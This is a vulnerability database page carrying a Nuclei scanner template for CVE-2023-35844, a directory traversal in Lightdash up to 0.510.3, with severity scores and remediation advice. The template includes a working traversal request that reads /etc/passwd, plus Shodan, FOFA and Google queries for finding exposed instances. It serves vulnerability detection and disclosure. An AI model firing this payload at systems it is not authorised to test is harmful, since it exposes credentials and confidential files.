Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-35844
HistoryJun 19, 2023 - 7:23 p.m.

Lightdash version <= 0.510.3 Arbitrary File Read

2023-06-1919:23:05
ProjectDiscovery
github.com
1
cve
arbitrary file read
directory traversal
unauthorized access
sensitive information
file extension validation
information security

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.161 Low

EPSS

Percentile

96.0%

packages/backend/src/routers in Lightdash before 0.510.3
id: CVE-2023-35844

info:
  name: Lightdash version <= 0.510.3 Arbitrary File Read
  author: dwisiswant0
  severity: high
  description: |
    packages/backend/src/routers in Lightdash before 0.510.3
    has insecure file endpoints, e.g., they allow .. directory
    traversal and do not ensure that an intended file extension
    (.csv or .png) is used.
  impact: |
    The vulnerability can lead to unauthorized access to sensitive information, potentially exposing user credentials, database credentials, and other confidential data.
  remediation: |
    Upgrade Lightdash to a version higher than 0.510.3 to mitigate the vulnerability.
  reference:
    - https://advisory.dw1.io/59
    - https://nvd.nist.gov/vuln/detail/CVE-2023-35844
    - https://github.com/lightdash/lightdash/commit/fcc808c84c2cc3afb343063e32a49440d32a553c
    - https://github.com/lightdash/lightdash/compare/0.510.2...0.510.3
    - https://github.com/lightdash/lightdash/pull/5090
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-35844
    cwe-id: CWE-22
    epss-score: 0.04986
    epss-percentile: 0.92655
    cpe: cpe:2.3:a:lightdash:lightdash:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: lightdash
    product: lightdash
    shodan-query:
      - title:"Lightdash"
      - http.title:"lightdash"
    fofa-query: title="lightdash"
    google-query: intitle:"lightdash"
  tags: cve,cve2023,lightdash,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/v1/slack/image/slack-image{{repeat('%2F..', 3)}}%2Fetc%2Fpasswd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220078c71d90ded5920c359305cf1fc5e017ee9a9e47afb2b5d957ae714438e74160221008de080f01a9ccb2d392f1d76f2a30d50ae71161f67ffdf6d4eaf8ce7792b6e19:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.161 Low

EPSS

Percentile

96.0%

Related for NUCLEI:CVE-2023-35844